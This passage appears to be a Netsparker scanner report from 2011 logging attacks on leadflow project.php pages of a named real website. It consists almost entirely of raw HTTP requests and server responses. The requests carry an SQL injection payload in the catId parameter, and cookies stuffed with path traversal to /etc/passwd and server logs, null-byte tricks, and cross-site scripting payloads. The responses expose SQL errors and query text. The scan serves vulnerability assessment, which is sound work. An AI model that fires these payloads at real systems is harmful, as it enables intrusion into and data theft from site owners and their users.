OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iig5diisqul3olm4irsljndr42; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/phsy00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=livvdcbe19llto6escv9d5ssf3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/meac00/project.php

/ppc/leadflow/meac00/project.php

http://www.insideup.com/ppc/leadflow/meac00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/meac00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g2ektgqg6f8aqv4u2pbescqi63; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/project.php?catId='+ (select 